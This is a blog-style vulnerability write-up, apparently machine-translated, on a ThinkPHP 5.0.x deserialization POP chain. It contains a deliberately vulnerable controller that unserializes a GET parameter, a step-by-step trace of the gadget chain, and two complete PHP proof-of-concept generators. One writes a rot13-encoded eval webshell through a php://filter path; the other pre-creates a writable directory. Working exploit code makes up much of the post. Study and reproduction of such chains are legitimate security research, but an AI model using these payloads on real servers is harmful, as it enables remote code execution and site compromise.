ThinkPHP5.0.x deserialization

Posted by urb on Tue, 21 Dec 2021 10:28:30 +0100

Vulnerability environment

  • Vulnerability test environment: PHP5 6+ThinkPHP5. zero point two four
  • Vulnerability test code: application / index / controller / index php
namespace app\index\controller;

class Index
    public function index()
	    $Gyan = unserialize($_GET['d1no']);
      return '<style type="text/css">*{ padding: 0; margin: 0; } .think_default_text{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333; font-size:18px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; }  p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> < H1 >:) < / H1 > < p > ThinkPHP V5 < br / > < span style = "font size: 30px" > a sword in ten years - a high-performance framework designed for API development < / span > < / P > < span style = "font size: 22px;" > [V5.0 version by < a href=“ "Target =" qiniu "> qiniuyun < / a > exclusively sponsored release] < / span > < / div > < script type =" text / JavaScript "SRC =" " charset="UTF-8"></script><script type="text/javascript" src=" "></script><think id="ad_ bd568ce7058a1091"></think>';

Vulnerability analysis

  • Let's start with a global search__ destruct method
  • Follow up ThinkPHP / library / think / process / pipes / windows In PHP__ destruct method and found that it called the removeFiles method
  • Follow up the removeFiles method
  • You can use file_ The exists function to trigger the of any class__ toString method
  • Global search__ toString method
  • Follow up ThinkPHP / library / think / model In PHP__ toString method, it is found that it calls the toJson method
  • Since the toArray method is called first in the return result of the toJson method, there are three places in the toArray method that can be triggered__ call method, which is triggered by $value - > getattr ($attr)
  • If you want to go further after else, you must first judge $modelRelation. The value of the variable comes from $this - > $relation(), and then call the Loader::parseName method. This method needs to pass in the variable $name and continue to backtrack. Since $this - > append is controllable, so $name is controllable. Here you can use the getError method in the Model class
  • Next, judge the value of $value, call the getRelationData method, pass in $modelRelation, and need the Relation type. After entering the method, judge the if condition first
$this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent)
  • Follow up the isSelfRelation method and getModel method and find that they are controllable
  • Due to available__ The call method selects the think\console\Output class, so the previous $value must be the think\console\Output class object, so the $this - > parent in the getRelationData method must also be the think\console\Output class object
  • Get here_ The class method requires $modelrelation - > getmodel() and $this - > parent to be of the same kind, that is, $value in $value - > getattr ($attr) and the above simple controllable model to be of the same kind, thus controlling $value in $value - > getattr ($attr)
  • Continue to check $attr, and its value is traced back to $bindattr = $modelrelation - > getbindattr(); Follow up ThinkPHP / library / think / model / relationship / onetoone In PHP, binAttr is controllable. So far, the code is executed to $item [$key] = $value$ value->getAttr($attr) : null; You can execute the Output class__ call magic method
  • Follow up the Output class block method
  • Continue to follow up the writelin method and find that the write method is called
  • Here, $this - > handle is controllable. The global search write method is further used. Follow up ThinkPHP / library / think / session / driver / memcached php
  • Continue to search for available set methods and follow up ThinkPHP / library / think / cache / driver / file PHP, you can execute file directly_ put_ The contents method is written to the shell, and $filename is controllable, and the pseudo protocol can be used to bypass the death exit
  • The $data value is rather tricky. Since the parameter in the last call set method comes from the previously called write method can only be true, and here $expire can only be numeric, so the file content can not write shell.
  • Continue to execute. Follow up the setTagItem method below, and the set method will be executed again. Here, the file content $value is assigned by $name (file name), so you can manipulate the file name, for example
php://filter/write=string.rot13/resource=./<?cuc cucvasb();?>
  • Here, refer to the POP chain structure diagram analyzed by master osword


  • Because windows has restrictions on file names, it will fail to write, so the vulnerability cannot be replicated in Windows environment
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{


class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];

namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query();#class Query

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
    function __construct(){

class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        $this->bindAttr = ["no","123"];

namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached();//The destination calls its write()
        $this->styles = ['getAttr'];

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;#Modification Division
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output();#Output object to call__ call()
        $this->append = ['getError'];
        $this->error = new HasOne();//Relation subclass with getBindAttr()
        $this->selfRelation = false;//isSelfRelation()
        $this->query = new Query();


namespace think\db;#Query
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();

namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File();//Destination call file - > set()
namespace think\cache\driver;#File
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => 'php://filter/write=string.rot13/resource=./<?cuc cucvasb();riny($_TRG[q1ab])?>',
        'data_compress' => false,
        $this->tag = true;

namespace think\model;
use think\Model;
class Pivot extends Model{

use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));
  • Generate file name rules
<?cuc cucvasb();riny($_TRG[pzq]);?> + 3b58a9545013e88c7186db11bb158c44
 Final file name:
<?cuc cucvasb();riny($_TRG[pzq]);?>3b58a9545013e88c7186db11bb158c44.php
  • During vulnerability exploitation, you should pay attention to the directory read-write permission. You can control options ['path '] ='/ Demo / ', use the framework to create a 755 folder (provided you have permissions). We can slightly modify the payload to create a directory with 0755 permissions (here we use the mkdir function in think\cache\driver\File:getCacheKey()), and then write files to this directory
  • poc create demo directory
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{


class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];

namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query();#class Query

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
    function __construct(){

class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        $this->bindAttr = ["no","123"];

namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached();//The destination calls its write()
        $this->styles = ['getAttr'];

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;#Modification Division
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output();#Output object to call__ call()
        $this->append = ['getError'];
        $this->error = new HasOne();//Relation subclass with getBindAttr()
        $this->selfRelation = false;//isSelfRelation()
        $this->query = new Query();


namespace think\db;#Query
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();

namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File();//Destination call file - > set()
namespace think\cache\driver;#File
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => './demo/',
        'data_compress' => false,
        $this->tag = true;

namespace think\model;
use think\Model;
class Pivot extends Model{

use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));

Loophole recurrence

  • First create a demo directory
  • Write files to this directory

Topics: PHP Web Security thinkphp